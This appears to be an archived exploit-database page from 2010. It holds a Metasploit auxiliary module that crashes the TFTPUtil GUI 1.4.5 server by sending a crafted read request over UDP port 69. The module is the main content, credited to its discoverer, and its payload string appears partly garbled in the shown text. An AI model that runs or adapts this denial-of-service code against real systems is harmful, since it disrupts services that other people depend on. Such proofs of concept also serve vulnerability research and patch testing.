[dos / poc] - TFTPUtil GUI 1.4.5 DoS (Meta)
Posted on 04 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>TFTPUtil GUI 1.4.5 DoS (Meta) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='TFTPUtil GUI 1.4.5 DoS (Meta) by Vuk Ivanovic in dos / poc | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>============================= TFTPUtil GUI 1.4.5 DoS (Meta) ============================= # Title: TFTPUtil GUI v1.4.5 Invalid Request DoS # CVE-ID: () # OSVDB-ID: () # Author: Vuk Ivanovic # Published: 2010-12-04 # Verified: yes ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## ## # # TFTPGUI v1.4.5 Invalid Request DoS # # Tested on: Windows XP, SP2 (EN) # # Date tested: 11/27/2010 # # # # Discovered by: Vuk Ivanovic(musashi42) # ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name' => 'TFTPGUI v1.4.5 Invalid Request DoS', 'Description' => %q{ The TFTPUtil GUI server version 1.4.5 can be DOSed by sending a specially crafted read request. Depending of the setup, sending write request "x00x02" may also work. Discovered by musashi42. }, 'Author' => 'musashi42', 'License' => MSF_LICENSE, 'Version' => '$Revision: 2 $', 'References' => [ [ 'URL', 'http://www.exploit-db.com/exploits/12482'], [ 'URL', 'http://www.securityfocus.com/bid/39872'], ], 'DisclosureDate' => 'December 04 2010')) register_options([Opt::RPORT(69)]) end def run connect_udp print_status("Sending read request...") $stuff = "�0x01" udp_sock.put($stuff) disconnect_udp end end # <a href='http://1337db.com/'>1337db.com</a> [2010-12-04]</pre></body></html>
